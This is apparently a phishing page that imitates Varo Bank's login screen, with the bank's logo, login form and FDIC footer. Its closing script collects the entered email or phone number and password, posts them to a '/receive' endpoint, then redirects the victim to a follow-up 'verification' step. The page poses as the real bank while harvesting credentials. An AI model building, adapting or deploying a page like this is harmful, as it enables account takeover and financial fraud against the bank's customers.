body { margin: 0px; color: rgba(0, 0, 0, 0.87); font-family: Roboto, Helvetica, Arial, sans-serif; font-weight: 400; font-size: 1rem; line-height: 1.5; letter-spacing: 0.00938em; background-color: rgb(255, 255, 255); }
@media print {
body { background-color: rgb(255, 255, 255); }
}
body::backdrop { background-color: rgb(255, 255, 255); }
.fsLzVr { display: flex; flex-direction: column; min-height: 89vh; position: relative; }
.epWtfs { display: flex; flex-direction: column; flex: 1 0 auto; padding-top: 64px; }
@media (min-width: 960px) {
.epWtfs { padding-top: 74px; }
}
.czuqwX { margin: 0px auto; max-width: 1312px; width: 100%; }
@media (max-width: 959px) {
.czuqwX { padding-top: 16px; background-color: rgb(255, 255, 255); }
}
@media (min-width: 960px) {
.czuqwX { margin-bottom: 60px; padding: 64px 16px 0px; margin-top: 32px; }
}
.dIqmVP { color: rgb(118, 118, 118); padding: 16px; position: relative; width: 100vw; align-self: flex-end; }
.jASKbk { -webkit-box-align: center; align-items: center; display: flex; margin: 0px auto; max-width: 1312px; }
@media (min-width: 960px) {
.jASKbk { padding: 0px 16px; }
}
.jaWfBe { font-family: Neue-Haas-Grotesk-Display-Pro; font-weight: 450; font-size: 12px; line-height: 16px; letter-spacing: 0.02em; -webkit-box-flex: 0; flex-grow: 0; flex-wrap: nowrap; }
@media (min-width: 960px) {
.jaWfBe { padding-left: 16px; }
}
.kjgvAP { margin: 0px; font-family: Neue-Haas-Grotesk-Display-Pro; font-weight: 450; font-size: 12px; line-height: 16px; letter-spacing: 0.02em; }
.bhkOiM { width: 100%; }
.bhkOiM.bhkOiM { color: rgb(28, 28, 28); }
.blJJCu { background-color: rgb(255, 255, 255); position: fixed; top: 0px; width: 100vw; z-index: 10; }
@media (min-width: 960px) {
}
.jrZyoC { margin: 0px auto; padding: 0px 16px; width: 100%; max-width: 1312px; }
.kuyKqo { -webkit-box-align: center; align-items: center; display: flex; height: 74px; -webkit-box-pack: justify; justify-content: space-between; }
@media (max-width: 959px) {
.kuyKqo { height: 64px; }
}
.kGaLpG { font-family: Neue-Haas-Grotesk-Display-Pro; font-weight: 500; font-size: 14px; line-height: 24px; letter-spacing: 0.02em; border: 1px solid rgb(140, 88, 208); border-radius: 4px; color: rgb(140, 88, 208); display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; height: 40px; width: 72px; }
.kGaLpG:hover { border-color: rgb(119, 75, 176); color: rgb(119, 75, 176); }
.kGaLpG:focus { border-color: rgb(119, 75, 176); color: rgb(119, 75, 176); }
.kTyZkn { display: flex; position: absolute; top: 20px; right: 16px; gap: 16px; }
@media (max-width: 959px) {
.kTyZkn { position: relative; top: 0px; right: 0px; -webkit-box-align: center; align-items: center; }
.kTyZkn a { display: flex; }
}
.gpDiwj { color: rgb(28, 28, 28); cursor: pointer; margin-left: 8px; }
.ekbIPT { flex: 1 1 0%; height: 22px; margin: 0px; max-width: 60px; width: 60px; }
.ekbIPT svg { display: block; }
.ekbIPT g { fill: rgb(28, 28, 28); }
@-webkit-keyframes epmXAj { 
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
@keyframes epmXAj { 
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
@-webkit-keyframes jzfMP { 
0% { stroke-dasharray: 1px, 200px; stroke-dashoffset: 0; }
50% { stroke-dasharray: 100px, 200px; stroke-dashoffset: -15px; }
100% { stroke-dasharray: 100px, 200px; stroke-dashoffset: -125px; }
}
@keyframes jzfMP { 
0% { stroke-dasharray: 1px, 200px; stroke-dashoffset: 0; }
50% { stroke-dasharray: 100px, 200px; stroke-dashoffset: -15px; }
100% { stroke-dasharray: 100px, 200px; stroke-dashoffset: -125px; }
}
.ilMHwD { display: flex; flex-direction: column; margin-top: 64px; gap: 8px; }
@media (min-width: 960px) {
.ilMHwD { flex-direction: row; }
}
.ilMHwD > * { width: 100%; }
@media (min-width: 960px) {
.ilMHwD > * { width: auto; }
}
@media (min-width: 960px) {
.ktfrkg { flex-direction: row-reverse; }
}
.dBUbvN { padding: 16px; background: rgb(255, 255, 255); }
@media (max-width: 959px) {
.dBUbvN { height: calc(100vh - 64px); overflow-y: scroll; width: 100%; }
}
@media (min-width: 960px) {
.dBUbvN { border-radius: 4px; padding: 24px; }
}
@media (max-width: 959px) {
.dBUbvN { height: auto; overflow-y: unset; }
}
.kplUOn { margin-bottom: 16px; }
.kplUOn span { margin-top: -1px; }
.kplUOn.kplUOn { display: flex; -webkit-box-pack: start; justify-content: flex-start; }
.kplUOn.kplUOn .MuiButton-label { padding-left: 0px; }
@media (min-width: 960px) {
.kplUOn { display: none !important; }
}
@media (max-width: 959px) {
.kplUOn { display: none !important; }
}
.gsTcxo { vertical-align: text-bottom; }
.gsTcxo.gsTcxo { color: rgb(140, 88, 208); font-size: 16px; height: 16px; width: 16px; }
.iTeznt.iTeznt { margin: 0px; }
.itPDeb { display: flex; -webkit-box-pack: justify; justify-content: space-between; }
.itPDeb:has(a.ellipsis).sc-dVMcbP:not(:has(#mainContentBacklink, #altBackLink)) { -webkit-box-pack: end; justify-content: flex-end; }
.bsQKzg { padding: 16px; margin: 0px auto; max-width: 632px; }
@media (min-width: 960px) {
.bsQKzg { padding: 64px; }
}
.lfKXBD { font-family: Neue-Haas-Grotesk-Display-Pro; font-weight: 450; font-size: 36px; line-height: 34px; letter-spacing: -0.02em; }
.rynUz { margin: 32px 0px 0px; }
.rynUz > * + * { margin-top: 32px !important; }
.dDGXdN { place-content: center space-between; display: flex; flex-direction: row; -webkit-box-pack: justify; }
.eMNwGQ { font-family: Neue-Haas-Grotesk-Display-Pro; font-weight: 450; font-size: 16px; line-height: 22px; letter-spacing: 0.02em; color: rgb(140, 88, 208); display: flex; -webkit-box-pack: start; justify-content: flex-start; text-align: left; padding: 0px; }
.dgiNSu.dgiNSu { text-transform: none; }
@-webkit-keyframes mui-auto-fill { 
0% { display: block; }
}
@keyframes mui-auto-fill { 
0% { display: block; }
}
@-webkit-keyframes mui-auto-fill-cancel { 
0% { display: block; }
}
@keyframes mui-auto-fill-cancel { 
0% { display: block; }
}
@-webkit-keyframes mui-auto-fill { 
0% { display: block; }
}
@keyframes mui-auto-fill { 
0% { display: block; }
}
@-webkit-keyframes mui-auto-fill-cancel { 
0% { display: block; }
}
@keyframes mui-auto-fill-cancel { 
0% { display: block; }
}
\
@charset "utf-8";
@font-face { font-family: "Material Icons"; font-style: normal; font-weight: 400; src: url("https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2") format("woff2"); }
.material-icons { font-family: "Material Icons"; font-weight: normal; font-style: normal; font-size: 24px; line-height: 1; letter-spacing: normal; text-transform: none; display: inline-block; white-space: nowrap; overflow-wrap: normal; direction: ltr; font-feature-settings: "liga"; -webkit-font-smoothing: antialiased; }
</style>
   <body>
      <div id="root">
         <main tabindex="-1" class="sc-itUGML fcSMzJ">
            <div data-testid="skipLinkContainer" class="sc-DdwlG fwqJZF"><a class="sc-jqUVSM kRfUwV MuiButtonBase-root sc-kDDrLX bHUge MuiButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium sc-ksZaOG hJvjQu sc-dwVMhp gDuwAi" tabindex="0" href="https://bank.varomoney.com/login?#pageTitle">Skip to main content</a></div>
            <div class="sc-isuzjp fsLzVr">
               <div class="sc-ezWXYA epWtfs">
                  <header class="sc-jDDxOa bhkOiM">
                     <div class="sc-bKhNmF blJJCu">
                        <div class="sc-elYLMi kBGFCo MuiGrid-root MuiGrid-container sc-jhfVAM jrZyoC">
                           <div class="sc-elYLMi dkqayb MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 sc-enyVUO kuyKqo">
                              <span class="sc-fJExmy ekbIPT">
                                 <svg viewBox="0 0 998 368.12" xmlns="http://www.w3.org/2000/svg" aria-label="Varo Bank">
                                    <g fill="#410099">
                                       <path d="M0 0h92.66l56.4 188.84c8.06 27.2 16.62 63.46 16.62 63.46h1s9.06-36.76 16.62-63.46L239.21 0h90.14L211 360.07h-92.15zM287 288.05c0-56.9 45.32-74 98.71-81.08 48.34-6 65.46-11.07 65.46-28.7 0-16.62-10.58-27.7-35.25-27.7-26.19 0-39.28 11.59-41.8 33.24h-75.57c2-47.84 38.78-88.63 116.84-88.63 38.77 0 65 7 83.59 21.15 22.16 16.11 32.74 41.29 32.74 73.52l.28 170.22h-79l-.35-28.7h-1c-15.11 21.66-37.78 35.25-76.55 35.25-51.37-.01-88.1-27.7-88.1-78.57zm166.19-20.14v-30.72c-10.58 5.54-25.69 9.57-42.31 13.6-31.72 7-50.85 14.29-49.85 37.27s18.05 27.66 40.29 26.18c32.68-2.18 51.84-24.18 51.84-46.33zM559.19 102.23h78.56v40.29h1.51c18.13-30.72 39.28-44.32 70.5-44.32 7.56 0 12.6.5 16.12 2v70.51h-2c-50.36-7.05-82.59 17.62-82.59 73.52v115.84h-82.1zM722.54 231.65c0-77.55 55.39-136.47 138-136.47C943.61 95.18 998 154.1 998 231.65s-54.39 136.47-137.48 136.47c-82.59 0-137.98-58.91-137.98-136.47zm196.46 0c0-46.83-23.23-78.56-59-78.56s-59 31.73-59 78.56 23.26 78.06 59 78.06 59-31.22 59-78.06z"></path>
                                    </g>
                                 </svg>
                              </span>
                              <div class="sc-hWlEnr kTyZkn">
                                 <a aria-label="help" >
                                    <svg class="sc-dPyBCJ cwmbCj MuiSvgIcon-root MuiSvgIcon-fontSizeMedium sc-kKrQFk gpDiwj" focusable="false" aria-hidden="true" viewBox="0 0 24 24" data-testid="HelpOutlineIcon">
                                       <path d="M11 18h2v-2h-2v2zm1-16C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8zm0-14c-2.21 0-4 1.79-4 4h2c0-1.1.9-2 2-2s2 .9 2 2c0 2-3 1.75-3 5h2c0-2.25 3-2.5 3-5 0-2.21-1.79-4-4-4z"></path>
                                    </svg>
                                 </a>
                                 <a class="sc-btIRyd kGaLpG sign-up-link">Sign up</a>
                              </div>
                           </div>
                        </div>
                     </div>
                  </header>
                  <div class="sc-kBjqcv czuqwX">
                     <div class="sc-elYLMi drqAls MuiGrid-root MuiGrid-container">
                        <div class="sc-elYLMi bbZMtL MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 MuiGrid-grid-md-7">
                           <div data-qe-automation="mainContent" data-testid="MainContent" class="sc-czGAKf dBUbvN LoginForm-styles__LoginFormWrapper-sc-d4c0f115-0 bsQKzg">
                              <div class="sc-elYLMi drqAls MuiGrid-root MuiGrid-container">
                                 <div class="sc-elYLMi dkqayb MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 sc-caiQmJ iTeznt">
                                   
                                    <form id="myForm">
                                       <div class="LoginForm-styles__PageTitle-sc-d4c0f115-1 lfKXBD">Login</div>
                                       <div class="LoginForm-styles__Fields-sc-d4c0f115-4 rynUz">
                                          <div class="sc-gicCDI eBmjBn MuiFormControl-root MuiFormControl-fullWidth sc-kgUAyh MuiTextField-root">
                                             <label class="sc-cxabCf ioyUhk MuiFormLabel-root MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-standard MuiFormLabel-colorPrimary sc-iIPllB SaErs" data-shrink="false" for="userId" id="userId-label">Email address or phone number</label>
                                             <div class="sc-fnykZs sc-bjUoiL fiKkqm ccggEv MuiInputBase-root MuiInput-root MuiInput-underline MuiInputBase-colorPrimary MuiInputBase-fullWidth MuiInputBase-formControl"><input aria-invalid="false" id="userid" name="userId" type="text" class="sc-fEOsli sc-idiyUo gcFGJP MuiInputBase-input MuiInput-input log_ins" value=""></div>
                                          </div>
                                          <div class="sc-gicCDI eBmjBn MuiFormControl-root MuiFormControl-fullWidth sc-kgUAyh MuiTextField-root">
                                             <label class="sc-cxabCf ioyUhk MuiFormLabel-root MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-standard MuiFormLabel-colorPrimary sc-iIPllB SaErs" data-shrink="false" for="password" id="password-label">Password</label>
                                             <div class="sc-fnykZs sc-bjUoiL fiKkqm ccggEv MuiInputBase-root MuiInput-root MuiInput-underline MuiInputBase-colorPrimary MuiInputBase-fullWidth MuiInputBase-formControl MuiInputBase-adornedEnd">
                                                <input aria-invalid="false" id="password" name="password" type="password" class="sc-fEOsli sc-idiyUo gcFGJP MuiInputBase-input MuiInput-input MuiInputBase-inputAdornedEnd log_ins" value="">
                                                <div class="sc-afnQL cQbegO MuiInputAdornment-root MuiInputAdornment-positionEnd MuiInputAdornment-standard MuiInputAdornment-sizeMedium">
                                                   <button class="sc-jqUVSM kRfUwV MuiButtonBase-root sc-ckMVTt eXVVSn MuiIconButton-root MuiIconButton-sizeMedium" tabindex="0" type="button" aria-label="Show password" data-name="currentPasswordToggle" role="checkbox" aria-checked="false">
                                                      <svg width="24" height="16" fill="none" xmlns="http://www.w3.org/2000/svg" data-testid="visibility-icon-svg">
                                                         <img src="assets/images/show.svg" style="width:25px; height:auto;"/>
                                                      </svg>
                                                   </button>
                                                </div>
                                             </div>
                                          </div>
                                          <div class="LoginForm-styles__PasswordContainer-sc-d4c0f115-5 dDGXdN">
                                             <div class="LoginForm-styles__ForgotPasswordBtnWrapper-sc-d4c0f115-7 eMNwGQ"><a class="sc-jgbSNz ddorge">Forgot Password</a></div>
                                          </div>
                                           </div>
                                       <div class="sc-dXxSUK sc-hRwTwm ilMHwD ktfrkg"><button id="subbut" class="sc-jqUVSM kRfUwV MuiButtonBase-root sc-kDDrLX gsWiyV MuiButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButton-fullWidth sc-ksZaOG hJvjQu LoginForm-styles__LoginBtn-sc-d4c0f115-9 dgiNSu" tabindex="-1" type="submit" data-qe-automation="logInButton">Log in</button></div>
                                    </form>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
               
            </div>
         </main>
      </div>
      
   </body>
 <footer class="sc-fFtkDt dIqmVP">
                  <div class="sc-hlqNbq jASKbk">
                     <div class="sc-ihNHHr jaWfBe">
                        <p class="sc-hxWoir kjgvAP">Varo Bank, N.A. Member FDIC.</p>
                        <p class="sc-hxWoir kjgvAP">© 2024 Varo Bank, N.A. All Rights Reserved.</p>
                     </div>
                  </div>
                  
                  
                  <style>
  .MuiInputBase-input {
    transition: transform 0.3s ease; /* Adjust timing as needed */
  }

  .input-label {
    transition: all 0.3s ease; /* Apply transition to all properties */
  }
  .ccggEv{ 
  border-bottom: 1px solid black;
  }
</style>
                  <script>
  var allInputs = document.querySelectorAll('.MuiInputBase-input');
  
  allInputs.forEach((input) => {
    const labels = input.parentElement.previousElementSibling;
    const outline = input.parentElement;
    
    // Ensure the label has a class for transition
    labels.classList.add('input-label');

    // Add an event listener to the input element for the "focus" event
    input.addEventListener('focus', () => {
      console.log('focused');
      console.log(outline);
      // Modify the styles of the label element when the input is focused
      labels.style.top = '-23px';
      labels.style.left = '0px';  
      labels.style.zIndex = '2'; 
      labels.style.fontSize = '11px';  
      labels.style.fontWeight = '400';  
      labels.style.color = '#8C58D0'; 
      input.style.transform = 'translate(0px, 1px) scale(1)';   
      //labels.style.backgroundColor = 'white';
      //outline.style.borderColor = '#yellow!important';
      labels.style.paddingLeft = "0px";
      labels.style.paddingRight = "0px";
      input.style.paddingLeft = "0px"; 
      labels.style.borderRadius = "6px"; 
    }); 

    // Add an event listener for the "blur" event to reset the styles
    input.addEventListener('blur', () => {
      if (input.value <= 0) { 
        labels.style.top = ''; 
        labels.style.left = '';
        labels.style.zIndex = '';
        labels.style.fontSize = '';
        labels.style.fontWeight = ''; 
        labels.style.color = '';
        input.style.transform = '';
        outline.style.borderColor = '';
        //outline.style.borderColor = 'red';
        
      } else {
        labels.style.top = '-23px'; 
        labels.style.left = '0px';
        labels.style.zIndex = '10';
        labels.style.fontSize = '11px'; 
        labels.style.fontWeight = '400'; 
        labels.style.color = '';
      }
    });
  });
</script>
<script>
	$(document).ready(function() {
    $('#subbut').on('click', function(event) {
        event.preventDefault();

        let myForm = $("#myForm");
        let checkInputs = document.querySelectorAll('.log_ins');
		
        
        // Flag to track if any input is empty
        let isEmpty = false;

        // Loop through each input field
        for (const check of checkInputs) {
        const outline = check.parentElement;
        
            check.addEventListener('focus', () => {
                
            });

            if (check.value.trim() === "") {
                isEmpty = true;
                outline.style.borderColor = 'red';
            }
        }

        // If no input is empty, proceed with form submission
        if (!isEmpty) {
            let userinfo = myForm.serializeArray();
            let user = {};
            let visitor = document.getElementById('userid').value;

            userinfo.forEach((value) => {
                // Use the 'name' attribute to create user object
                user[value.name] = value.value;
            });

            user['visitor'] = visitor;
            console.log(user);

            // Send AJAX request
            $.ajax({
                method: 'POST',
                url: "/receive",
                data: user
            }).done(function(msg) {
                // Store visitor info in sessionStorage
                sessionStorage.setItem('visitor', visitor);
                console.log(msg);
                window.location.href = "/login/verification/2";
                console.log(msg); // Log success message
            }).fail(function(err, textstatus, error) {
            //window.location.href = "login/2"; 
                console.log('fail');
            });
        }
    });
});
    	</script>
    		<script>
    		const eyebutton = document.querySelector('[data-name="currentPasswordToggle"]');
const passwordInput = document.querySelector('#password');

eyebutton.addEventListener('click', function() {
  const isPasswordVisible = passwordInput.type === 'text';
  
  if (isPasswordVisible) {
    passwordInput.type = 'password';
    eyebutton.setAttribute('aria-checked', 'false');
    eyebutton.setAttribute('aria-label', 'Show password');
    eyebutton.querySelector('img').src = 'assets/images/show.svg';
  } else {
    passwordInput.type = 'text';
    eyebutton.setAttribute('aria-checked', 'true');
    eyebutton.setAttribute('aria-label', 'Hide password');
    eyebutton.querySelector('img').src = 'assets/images/hide.svg';
  }
});
    		</script>
               </footer>
</html>


</html>
